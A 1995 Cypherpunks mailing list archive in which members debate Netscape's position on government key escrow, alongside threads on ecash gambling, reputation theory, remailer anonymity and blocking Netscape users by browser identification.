Dec 1995, Jeff Weinstein wrote: > > > See my recent message to this list. We will be taking an anti-GAK > > > position. > > > > So you will refuse to implement GAK in future version of netscape then? > > Or you will merely do lipservice to the GAK policies at the conference? > > > > I think the distinction is quite key. > > If the law requires GAK, then I believe that we will implement it rather > than just disable encryption. We are taking a position against GAK and > will continue to lobby against it. We are planning to continue to do both > US and Export versions, so I don't think that the government's ploy of > trying to lure companies into weakening their domestic versions will work. AT&T seems to have been suitably 'incentivized' The receipt of government funding (in whatever guise) might be just as powerful in this case. To the outsider, it looks as if Netscape 'owes' the government. > We released a 128-bit version of our product almost a year ago, at a > time when many companies were providing only weak crypto in their domestic > products so that they didn't have to trouble themselves with two versions. And this is impressive. Stamina, however, is much more difficult. > We are actively lobbying in washington to get clarification of the > current regulations so that we can provide the US version via an "export > controlled" FTP or HTTP download. With which firm? Or have you made it an in-house effort? > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From unicorn at polaris.mindport.net Sat Dec 2 11:25:10 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 3 Dec 1995 03:25:10 +0800 Subject: Info on Netscape's key escrow position In-Reply-To: <9512021318.AA27932@all.net> Message-ID: On Sat, 2 Dec 1995, Dr. Frederick B. Cohen wrote: > The point Netscape seems to miss is that by refusing to go with weak > crypto and having the best product on the market, Netscape may be able > to force these governments into a position of accepting it. [...] > The right move for Netscape is to improve crypto-security, to refuse to > give in to government, and to publicly vilify the people in government > who stand in their way. When billions of dollars are at stake and the > blame is placed squarely on the shoulders of a politician trying to > claim economic improvements based on their policies, the politician is > likely to yield. "Gee, I dunno, that sounds like a lot of work, and well, I'm making good dough. Sure, it would be a boon for the company, and fit right in with the mainstream perception that government way too involved in Joe Random's life, and win or lose, either way it would be a major public relations coup, and would restore the confidence of many foreign customers concerned about U.S. economic intelligence goals, but well... it just sounds so... subversive. Honey, could you pass the jam?" > > > -> See: Info-Sec Heaven at URL http://all.net/ > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From loki at obscura.com Sat Dec 2 11:33:24 1995 From: loki at obscura.com (Lance Cottrell) Date: Sun, 3 Dec 1995 03:33:24 +0800 Subject: Netscape GAK page. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I have gone back and improved the "Netscape GAK?" page based on a good nights sleep and some helpful suggestions (thanks you all who mailed me about the page). I would appreciate feedback on the page, especially from Netscape or its employees (in an official or unofficial capacity). I have tried to be even handed in my presentation of the information, while not hiding the fact that I strongly disagree with the stance that Netscape has taken. -Lance -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMCoVPPzr81BVjMVAQF5vQf/R1AgxAEhjR8AkD29WbRFHqA7wpw5R6dq B2YJGM9J2g5g9y6gf/YKTGVp/Lp4qmExhi3zZPkOsHefF/xufBZ7N42depO9F0dS cqGcCq8+qhTYeNhjjqMn1DgM9oeuVJdDCF1KUonUhQiiWthTAlgFLsWwcQznq7FK J533laBREzrXmxAQbfxnw/cc7J9wRPuzUgDQ61RlO8x1VtZxugSvbVpFDpDBYL1A W028bnKJfK52cp6nliKjjk6k5ElccPsLk82mS0Fyhfh+Gt4QMLx+UHuKgaVwGHsa m6sAXMxuWDg2x3myW0NKxs8qj9hDZzwG4T7/QFSKbkQkQGFIvWa+Fw== =h3v6 -----END PGP SIGNATURE----- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From solman at MIT.EDU Sat Dec 2 11:48:06 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Sun, 3 Dec 1995 03:48:06 +0800 Subject: Cypher secure versus computationally unbounded adversary Message-ID: <9512021931.AA01944@ua.MIT.EDU> Hi all, I've just come up with a method for implementing and encryption algorithm that is absolutely secure from passive attacks by a computationally unbounded adversary. Is this a new capability, or am I reinventing the wheel here? Thanks, Jason W. Solinsky From unicorn at polaris.mindport.net Sat Dec 2 11:50:09 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 3 Dec 1995 03:50:09 +0800 Subject: Why Netscape employees should not leave... In-Reply-To: Message-ID: On Sat, 2 Dec 1995, Timothy C. May wrote: > At 8:33 AM 12/2/95, sameer wrote: > >> > >> So, for a 15% reduction in salary and 30 days of job search, is it worth it? > > > > 30 days? in silicon valley? you *must* be joking. (i suppose > >the market for good net-folks isn't as big over on the right coast.) > > Just a minor clarification. I don't speak for any of the Netscape employees > here (nor am I encouraging them to leave...they cay do *more* within > Netscape than merely be resigning in some sort of protest). [...] > I'm critical of Netscape, like others are, on various issues. But I sure do > hope we never turn this criticism into suggestions that Jeff and the other > Netscape folks here should quit in protest. That smacks too much of "you're > working for the war machine!" stridency. (Next we'll be having people dump > buckets of blood over piles of Netscape Navigator at Fry's.) The point that should have come across was that it is hyprocracy for the Netscape employee to proport to be a strong crypto supporter of any great degree when the phrase 'the money is more important to me' could be applied. I tend to agree that the resulting effect was instead a version of "if your not a part of the solution, you're part of the problem." I just get sick of those who tout themselves as Experts in Software Munitions and are in fact are merely in it for the cash. In it for the cash is just fine. Just don't tell me later you aren't. I don't care if Netscape makes a pile of money as of now. Until they show themselves as a company with backbone in the area I consider important, my investment dollar goes elsewhere. > > I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal > on the actual issue of whether Netscape will build a U.S.-supported GAK (as > opposed to offering GAK for the Iraqis or French). I await with interest > the clarification of the anti-GAK stance that Jeff alluded to. I believe you got it with: "If the law requires GAK, then I believe that we will implement it rather than just disable encryption." Note that the phrase is entirely ambigious on whether this refers to the law requiring GAK for export, or export AND domestic sales. Netscape will install GAK into whatever will increase its sales. I understand and respect this position in the context of a company which needs badly to start raking in some profits. The title "Software Munitions Expert" or similar such should probably be changed to "GAK marketing expert" however. > --Tim May > > Views here are not the views of my Internet Service Provider or Government. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From solman at MIT.EDU Sat Dec 2 11:52:21 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Sun, 3 Dec 1995 03:52:21 +0800 Subject: Cypher secure versus computationally unbounded adversary In-Reply-To: <9512021931.AA01944@ua.MIT.EDU> Message-ID: <9512021936.AA01996@ua.MIT.EDU> What I meant to say, was that the encryption protocol is secure versus a computationally unbounded passive adversary AND REQUIRES NO PRIOR COMMUNICATION. Sorry 'bout that, Jason W. Solinsky From attila at primenet.com Sun Dec 3 03:54:09 1995 From: attila at primenet.com (attila) Date: Sun, 3 Dec 95 03:54:09 PST Subject: prototype slot-machine In-Reply-To: <199512030623.WAA17815@infinity.c2.org> Message-ID: On Sat, 2 Dec 1995, sameer wrote: > I've written up a slot-machine thing for ecash, very > experimental, very buggy, not very slick, (i'd like to get the > technical bugs worked out before i put a fancy wrapper on it) and i'd > *like* to announce it here for testing, but I'm worrying about > gambling laws.. > any thoughts? > sure, just put it up on a foreign server. bahamas, caymans, etc. there are several gambling bits going on from what I read. I dont gamble so I never noted any addresses down, but someone should remember or have it in their archives. > -- > sameer Voice: 510-601-9777 > Community ConneXion FAX: 510-601-9734 > The Internet Privacy Provider Dialin: 510-658-6376 > http://www.c2.org/ (or login as "guest") sameer at c2.org > From unicorn at polaris.mindport.net Sat Dec 2 11:56:17 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 3 Dec 1995 03:56:17 +0800 Subject: Netscape GAK page. In-Reply-To: Message-ID: On Sat, 2 Dec 1995, Lance Cottrell wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > I have gone back and improved the "Netscape GAK?" page based on a good > nights sleep and some helpful suggestions (thanks you all who mailed me > about the page). I would appreciate feedback on the page, especially from > Netscape or its employees (in an official or unofficial capacity). I have > tried to be even handed in my presentation of the information, while not > hiding the fact that I strongly disagree with the stance that Netscape has > taken. If you are interested in a scathing essay on Netscape and its responsibilities (in my view) for opposing GAK for the page, I will write one for you free of charge.... > > > > -Lance > > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQEVAwUBMMCoVPPzr81BVjMVAQF5vQf/R1AgxAEhjR8AkD29WbRFHqA7wpw5R6dq > B2YJGM9J2g5g9y6gf/YKTGVp/Lp4qmExhi3zZPkOsHefF/xufBZ7N42depO9F0dS > cqGcCq8+qhTYeNhjjqMn1DgM9oeuVJdDCF1KUonUhQiiWthTAlgFLsWwcQznq7FK > J533laBREzrXmxAQbfxnw/cc7J9wRPuzUgDQ61RlO8x1VtZxugSvbVpFDpDBYL1A > W028bnKJfK52cp6nliKjjk6k5ElccPsLk82mS0Fyhfh+Gt4QMLx+UHuKgaVwGHsa > m6sAXMxuWDg2x3myW0NKxs8qj9hDZzwG4T7/QFSKbkQkQGFIvWa+Fw== > =h3v6 > -----END PGP SIGNATURE----- > > ---------------------------------------------------------- > Lance Cottrell loki at obscura.com > PGP 2.6 key available by finger or server. > Mixmaster, the next generation remailer, is now available! > http://obscura.com/~loki/Welcome.html or FTP to obscura.com > > "Love is a snowmobile racing across the tundra. Suddenly > it flips over, pinning you underneath. At night the ice > weasels come." > --Nietzsche > ---------------------------------------------------------- > > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From sameer at c2.org Sat Dec 2 12:03:22 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 04:03:22 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: Message-ID: <199512021936.LAA09776@infinity.c2.org> > > With which firm? Or have you made it an in-house effort? > There was no Netscape (or RSADSI, for that matter [an RSADSI employee showed up, but it was on his own time]) representative at the recent Bernstein hearing in SF. I think that shows how much they really care. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From fc at all.net Sun Dec 3 04:08:07 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sun, 3 Dec 95 04:08:07 PST Subject: Suggestion for CP browser Message-ID: <9512031205.AA24992@all.net> I think a CP browser is just the ticket to change the way the world works. How about this: - CP writes a browser with PGP or better quality crypto. - CP makes it freely available to any individual - CP licenses it to corporations for $1 per copy - Funds produced go to support worthy causes, support a permanent home for CP, and support anti GAK efforts (lobying, etc.) I think the CP browser should include an embedded language (not Java - maybe a version of LISP) that does a far better job than Java of assuring limitations on what programs can do. It should also support faking the source of a browser request (for privacy of the user), all forms of digital cash, firewall-type forwarding, pseudonyms, and all of the other things that CPs fight for. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From printing at explicit.com Sun Dec 3 04:26:29 1995 From: printing at explicit.com (William Knowles) Date: Sun, 3 Dec 95 04:26:29 PST Subject: prototype slot-machine Message-ID: >On Sat, 2 Dec 1995, sameer wrote: > >> I've written up a slot-machine thing for ecash, very >> experimental, very buggy, not very slick, (i'd like to get the >> technical bugs worked out before i put a fancy wrapper on it) and i'd >> *like* to announce it here for testing, but I'm worrying about >> gambling laws.. >> any thoughts? >> On Sun 3 Dec 1995, Attilla wrote: sure, just put it up on a foreign server. bahamas, caymans, etc. >there are several gambling bits going on from what I read. I dont gamble >so I never noted any addresses down, but someone should remember or have >it in their archives. Try this site: Offshore Infomation Services in Anguilla, http://www.offshore.com.ai/ William Knowles printing at explicit.com ... //!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ Graphically Explicit Printing - Advertising - Graphic Design 1555 Sherman Avenue - Suite 203 Evanston IL., 60201-4421 800.570.0471 - printing at explicit.com Accept, Embrace, Adapt, Create \\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!// From fstuart at vetmed.auburn.edu Sat Dec 2 12:33:47 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Sun, 3 Dec 1995 04:33:47 +0800 Subject: Barring access to Netscape Message-ID: <199512022022.OAA19354@snoopy.vetmed.auburn.edu> >> >Shouldn't be too hard to hack this into Apache. > > Should my commercial release of Apache/SSL include this? ;-) >(I could make it into a configuration option, so that if the >User-Agent is Mozilla, it passes Back a Refresh: header with the >response....) Well, I think configurable redirects based on User-Agent would be a good thing. However, if you don't control the server being used you can still use client pull to redirect on a page-by-page basis. I've been made aware of at least one non-Netscape browser that does client pulls, so checking the User-Agent would be desirable, but (AFAIK) that isn't possible without modifying the server, using cgi, or something along those lines. I've got the perl script to automatically add (and remove) the meta-http lines to individual pages more or less done, but I won't release it just yet (if at all). Jeff Weinstein's promise to make Netscape's GAK policy publically available is an important step in the right direction. However, whatever their policy statement ends up saying, it should be obvious that their level of commitment to opposing GAK is minimal at best. | (Douglas) Hofstadter's Law: Frank Stuart | It always takes longer than you expect, even fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law. From anonymous-remailer at shell.portal.com Sat Dec 2 12:41:38 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 3 Dec 1995 04:41:38 +0800 Subject: Talking to Jim Message-ID: <199512022024.MAA08119@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- On Sat 2 Dec 1995 05:24 one of the Alices wrote on the subject of Jim's comments about "bubbles" and such, and ended up automatically filtered to my Deleted folder (THAT will teach me to be curious about what ends up there!): > The market seems to "think" that it's a better present judge > of what Netscape has than he does. It's almost as though > the "market" has developed a "mind" of its own. Well, of course! Markets are the most efficient integration of the minds of the participants, hands down. > It's own particular neural network. Exactly. Literally. And huge, too. > It's almost as though there is automated software at work. There is: Wetware. Massive concurrent processing, heavy parallelism, inefficient I/O. Distributed, redundant memory. Inefficient but infinitely adaptable interprocessor routing. Capable of handling any degree of outage. All elements individually expendable. Self-replicating processors that have significant lead time but integrate smoothly into the net. Designs and builds its own outboard peripherals and interconnects. Best damned planetary computing system in this star system. But I diverge... It's not always right (though self-fulfilling prophecy is often a big part of the equation), and it often misses the anolamies, but because it IS an integration is precisely why it may mean something different than you suggest. It may in fact be the best barometer we have of the true depth of the exploding Internet phenomenon. Completely aside from the question of whether or not the seeming Netscape overvaluation bubble bursts, etc., Netscape's share price more directly reflects the personal involvement and upward view of real people with respect to the Internet/WWW than anything else we have. Remember, there are still naysayers out there, declaiming in places from books to columns to TV, while the reality is that computers are now outselling televisions, and a key new form of synergistic human communication is exploding in exponential growth. Humans deal on a personal level only moderately well with linear processes, and poorly with geometric processes -- it's understandable that the growth of the Internet/WWW and the implications of thereof would be late in being recognized and be incorrectly understood until sometime AFTER the changes have rocked the society. Markets, though, more accurately reflect what people are actually doing, what they are willing to do, and what they think "in their gut" will happen. While they also reflect what people might LIKE to happen, they reflect, too, that what people WANT to happen, their desires often MAKE happen. Capitalize ME to the tune of $5 billion, for instance, and I may be influential not only during the course of your life but the lives of your great-grandchildren. Selling Netscape short may or may not be a wise move -- selling market processes short is usually a fool's exercise in self-delusion. We Jurgar Din (that will have to suffice: I do not yet live in a free country) +"The battle, Sir, is not to the strong alone. It is to the+ +vigilant, the active, the brave. Besides, Sir, we have no + +election. If we were base enough to desire it, it is now + +too late to retire from the contest." -Patrick Henry 1775 + -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMCsBEjw99YhtpnhAQE04QH8C+jk59lxyAqkVlfhd2VLw3TJKnECdXXJ fNE7S0QZyd5eqFnZ4wTyHeX18YfTg+xiFZPPfxpRCdgO/x2K8sxFWQ== =/2cN -----END PGP SIGNATURE----- From froomkin at law.miami.edu Sat Dec 2 12:59:31 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 3 Dec 1995 04:59:31 +0800 Subject: WTO an even worse possibility as Inet regulator. In-Reply-To: Message-ID: Oh dear. First off, it's the "Royal Institute of International Affairs" Second, I haven't read or seen the report although I ordered it yesterday. Third.......I am a Foreign Associate of RIIA.... They do nice seminars in a nice part of London near where I once worked. Fourth, RIIA is a think tank, that is part of the UK establishment but not part of the government, much like Brookings, Hoover Institution, Council on Foreign Relations, are in the U.S. It doesn't speak for the UK government, and sometimes criticizes it (usually politely). It doesn't necessarily speak for business, although it certainly speaks *to* it and about it. Fifth, that doesn't mean the report is right. Or necessarily influential. RIIA issues lots of reports, several a month, and most sink without a visible trace. But some don't. So, it could be influential. Especially in the UK. Depends how good/scary it is. I'll report if my copy ever gets here. With the Xmas mails, I figure January at best. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From unicorn at polaris.mindport.net Sat Dec 2 13:11:45 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 3 Dec 1995 05:11:45 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <199512021936.LAA09776@infinity.c2.org> Message-ID: On Sat, 2 Dec 1995, sameer wrote: > > > > With which firm? Or have you made it an in-house effort? > > > > There was no Netscape (or RSADSI, for that matter [an RSADSI > employee showed up, but it was on his own time]) representative at the > recent Bernstein hearing in SF. I think that shows how much they > really care. While I suspected this, I don't think we needed it to show us how much they really care. It seems fairly obvious from the outset. > > -- > sameer Voice: 510-601-9777 > Community ConneXion FAX: 510-601-9734 > The Internet Privacy Provider Dialin: 510-658-6376 > http://www.c2.org/ (or login as "guest") sameer at c2.org > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From aleph1 at dfw.net Sat Dec 2 13:15:18 1995 From: aleph1 at dfw.net (Aleph One) Date: Sun, 3 Dec 1995 05:15:18 +0800 Subject: Netscape Feeding Frenzy Message-ID: It sad to see to many bright people trial and condem a company or its employees in such a short time and with so little evidense. Yes, I like you, dont want to see GAK on Netscape products. But this is ridiculous. It reminds me of the Microsoft Win95 fiasco. (And I do hate Microsoft). Remember all the heat they took just because someone claimed that the installation software took a snapshoot of your system and network and then gave it to Microsoft through the MSN. It even made it into trade magazines like InformationWeek. Of curse they then had their tail between their legs when they realized that it was just the registration wizard that asked for permission and that the information uploaded was much less intrusive. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From hfinney at shell.portal.com Sat Dec 2 13:33:05 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 3 Dec 1995 05:33:05 +0800 Subject: towards a theory of reputation In-Reply-To: Message-ID: <199512022116.NAA11199@jobe.shell.portal.com> Sorry to be so late picking up this thread, but I was very busy this past week. Wei Dai writes: >Can you elaborate more on why the analysis is inadequate? (I know it >probably isn't adequate, but why do you think so?) "Reputation" is a fairly broad concept. It generally refers to our expectations of how some person will behave in various circumstances. To some extent, every character trait can have a reputation associated with it. A person can have a reputation for honesty, for efficiency, for steadiness, for accuracy, and so on. Even looking at it solely from the point of view of a consumer choosing a service provider, any or all of these traits might be important depending on the situation. If I need the work done right away, I will choose a supplier with a reputation for speed. If I want to be sure it is right and doesn't have to be redone, I will chose one with a reputation for care and accuracy, and so on. I don't think the notion of a graph showing utility (an overall summing up of value to me) versus cost really captures this notion. Such a graph is useful and adequate for some forms of economic analysis where certain simplifying assumptions are made, but I don't think it will work in this case. One of the big issues we would want to analyze is the impact of various sets of rules and conventions for how trades occur. The question is how trust could be established, or how trade could occur in its absence, given the possibility of avoiding retribution for dishonest behavior that anonymous communication allows. In this analysis we are going to need more information than just utility vs price. We will need to separate out those various factors which go to make up the utility. Changing the market conventions (say, by introducing escrow agencies) will change the weightings of the various factors that make up utility. If I no longer have to trust the honesty of the person I am trading with (because we have an escrow agency to help us make the exchange) then the importance of his reputation for honesty goes down. The result is that the "reputation" curves will change rather dynamically and unpredictably as we consider different possible structures in the market. This will make the analysis of them intractable, I would think. As I wrote before, it makes more sense to me to focus explicitly on the issue of trust and honesty, since those seem to be the main issues which are going to take on more importance in an anonymous market. Yes, they are important in already existing markets, too, and there are plenty of fly by night, hole in the wall companies which exist solely to do business dishonestly and then evade retribution. But the ease of doing these things could increase in an anonymous market. The other fact that makes trustworthiness more important in such a market is the cost it applies. One of the potential benefits of anonymity is privacy. To establish trust by keeping a steady pseudonym (as was suggested earlier, a trade name or brand name performs this function even as companies and personnel change out from under it) means giving up a certain level of privacy. Even if the trade name is controlled pseudonymously, the linkability of its transactions represents a form of exposure which can be seen as a cost. If the only way to be successful in business is to give up some of the privacy that anonymity would provide by working through a consistent pseudonym, that would be an interesting result. Again, the issue is primarily one of trustworthiness, as I see it. I do think the idea of analyzing costs in terms of "throwing away your reputation" by cheating and starting anew is an interesting approach. The question is whether you can really quantify the value of a reputation. I know in business now corporations do carry on their books something called "good will" which I believe is roughly the value of their good name and trade marks. However it is not normally considered to be a major asset, I think. Hal From hal9001 at panix.com Sat Dec 2 13:57:10 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sun, 3 Dec 1995 05:57:10 +0800 Subject: [NOISE] Barring access to Netscape Message-ID: At 15:41 12/1/95, Herb Sutter wrote: >At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote: >>If you want to see one way of locking out Netscape users, check out this >>URL which points at a Web Page that will not allow access by Netscape Users > >Just a personal note... while I am strongly in favour of security, this >seems rather petulant and knee-jerkish. > >JeffW: Please add a configuration option to let users override the "Mozilla" >ident, so that they can continue to use Netscape at all sites. I personally >won't use the override, though; if a site is going to insist on trying to >frivolously exlude me as a user based on nothing but the browser I choose to >use, they aren't serious anyway. > >>(the guy is ticked off at them trying to establish their own standards) - > >The _market_ establishes standards (been proven time and time again). His >reaction sounds pretty childish to me, but YMMV... > >Herb I am not advocating his gripe (or the security question) - My message was posted to provide an example of how to treat Netscape users special by locking them out IF you have a need/desire to do so (which was what was being requested). From tcmay at got.net Sat Dec 2 13:57:13 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 1995 05:57:13 +0800 Subject: A "Warning Banner" for Netscape Navigator? Good idea! Message-ID: At 2:39 AM 12/2/95, Robert Hettinga wrote: >It's been a long and interesting day... > >>Pull down the 'Options' menu, grab the 'Window and Link styles' >>page, and change the default "home page location" from >>netscape's to whatever you want. > >Oh. *Those* advertisements! I couldn't for the life of me figure out *what* >Tim was talking about. I've made mine come up blank since the initial, >"Hey, what do these twiddly bits in the Preferences command do...", session Indeed, I figured this out a long time ago, too. As I said in a recent post, I don't have Netscape's page come up when I start Netscape. The ads I'm talking about are the ads introduced when various Net tools are used, such as Infoseek, Deja News, Excite, Yahoo, etc. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sinclai at ecf.toronto.edu Sun Dec 3 06:10:26 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sun, 3 Dec 95 06:10:26 PST Subject: Cypher secure versus computationally unbounded adversary In-Reply-To: <9512021931.AA01944@ua.MIT.EDU> Message-ID: <95Dec3.091041edt.1000@cannon.ecf.toronto.edu> > Hi all, > > I've just come up with a method for implementing and encryption algorithm > that is absolutely secure from passive attacks by a computationally > unbounded adversary. Is this a new capability, or am I reinventing the > wheel here? > > Thanks, > > Jason W. Solinsky That is certainly new. Infact, I think there are proofs that say you can't do it. I'm positive you can't do it if the plaintext does not have maximum entropy. So, tell us your scheme. From s1113645 at tesla.cc.uottawa.ca Sun Dec 3 06:35:25 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 3 Dec 95 06:35:25 PST Subject: prototype slot-machine In-Reply-To: Message-ID: > On Sun 3 Dec 1995, Attilla wrote: > > sure, just put it up on a foreign server. bahamas, caymans, etc. > >there are several gambling bits going on from what I read. I dont gamble > >so I never noted any addresses down, but someone should remember or have > >it in their archives. Or check out a whole slew of other gambling ventures at They were in on the ecash trial, I think. From master at internexus.net Sun Dec 3 08:37:10 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sun, 3 Dec 95 08:37:10 PST Subject: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED. In-Reply-To: <199512030524.VAA24279@jobe.shell.portal.com> Message-ID: > As I promised, I've now opened a channel so that anyone who wants to > can send Alice de 'nonymous email. I can now be reached via > an455120 at anon.penet.fi. Mail sent to Alice de 'nonymous at that > address will get to me, and I will do my best to reply to you as well, > but I can't guarantee, anything. I don't think that was a smart thing to do. Your real email is now registered in some database in Finland - how difficult would it be to retrieve it? From what I remember organizations like Scientology had no problem getting real emails from anon.penet.fi when they reported that anXXXXXX was causing trouble... couldn't the same be done for your account? If that single system becomes compromised one day all the accounts could be posted on some web page somewhere and it would be a simple matter of looking you up! Signing your message with PGP and using Mixmaster would give yourself an identity while still keeping you anonymous. From master at internexus.net Sun Dec 3 08:41:30 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sun, 3 Dec 95 08:41:30 PST Subject: your mail In-Reply-To: <199512030732.XAA23416@infinity.c2.org> Message-ID: > > Competing with Netscape is obviously something that's easier said than > > done. But we ought to consider the strategic importance of having robust, > > I hate to repeat myself, but sometimes people don't listen. > http://www.c2.org/apachessl/ I don't see how you can charge for a commercial versions of ApacheSSL. Isn't it protected by the GNU license agreement? Or is the idea that by registering ApacheSSL you still get the software for free but you are required to pay for support. From dan at milliways.org Sun Dec 3 08:55:00 1995 From: dan at milliways.org (Dan Bailey) Date: Sun, 3 Dec 95 08:55:00 PST Subject: Suggestion for CP browser Message-ID: <199512031655.QAA25843@pop01.ny.us.ibm.net> On Sun, 3 Dec 1995 07:05:06 -0500 (EST) you wrote: >I think a CP browser is just the ticket to change the way the world works. >How about this: [snip] > - Funds produced go to support worthy causes, support a permanent > home for CP, and support anti GAK efforts (lobying, etc.) A while back it was mentioned here that Eric Hughes set up Cypherpunk Labs, Inc, and it was supposed to provide scholarships to crypto-minded students and offer computational resources for those late-night factoring sessions. Did anything ever happen with that? I could use a scholarship about now...;) > >I think the CP browser should include an embedded language (not Java - >maybe a version of LISP) that does a far better job than Java of assuring >limitations on what programs can do. It should also support faking the I think Java is going to become a standard to run with. It's pretty close to C, so it isn't hard to pick up and it performs acceptibly. While I don't mind coding in LISP or Scheme, I think most programmers in the trenches would rather fight than recurse. Dan *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From alano at teleport.com Sat Dec 2 17:02:45 1995 From: alano at teleport.com (Alan Olsen) Date: Sun, 3 Dec 1995 09:02:45 +0800 Subject: Info on Netscape's key escrow position Message-ID: <2.2b7.32.19951203004908.0087902c@mail.teleport.com> At 11:01 PM 12/1/95 -0800, you wrote: > > I had lunch with Jim Clark today, and explained the furor that was >currently going on in cypherpunks and elsewhere. After lunch he sent >me the e-mail that I've attached below to pass along. I think the gist >of it is that if governments require key escrow, we will have to do it >in order to sell our products with encryption into those countries. [rest removed for brevity] Well someone has to say it... "I am glad to see that Jim Clark is no longer hocking up GAK." I just hope Netscape does not get seduced by the dark side of the feds and impliment GAK "because they have to". It is one thing to have cryptography that is brute forcable in a few weeks, it is another to have a secret key that some nosey government agent use to decrypt it in seconds. If Netscape impliments GAK I will move to something else because I will not be able to trust that some other nasty surprise will exist in the software. (As well as having no real security left in the product.) Do I beleive that Netscape will impliment GAK in the near future? Not really. Not unless they go through another purge like the one back in February(?), but I do not see that as being very likely. (With the current IPO, news of a employee purge would probibly drive down the stock and that would be the last thing the top brass would want.) | What is the Eye in the Food Pyramid? | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | | From alano at teleport.com Sat Dec 2 17:09:16 1995 From: alano at teleport.com (Alan Olsen) Date: Sun, 3 Dec 1995 09:09:16 +0800 Subject: Getting a copy of the Jim Clark speech Message-ID: <2.2b7.32.19951203004910.00868478@mail.teleport.com> At 09:47 PM 11/29/95 -0800, you wrote: >At 09:43 PM 11/30/95 -0600, Frank Stuart wrote: >> I'm working on an "obnoxify" program to convert >> normal html documents into documents that look >> normal to non-netscape browsers, but are too painful to >> read with netscape (, , etc.). >> I think tomorrow evening would be a good time to decide >> whether or not to distribute 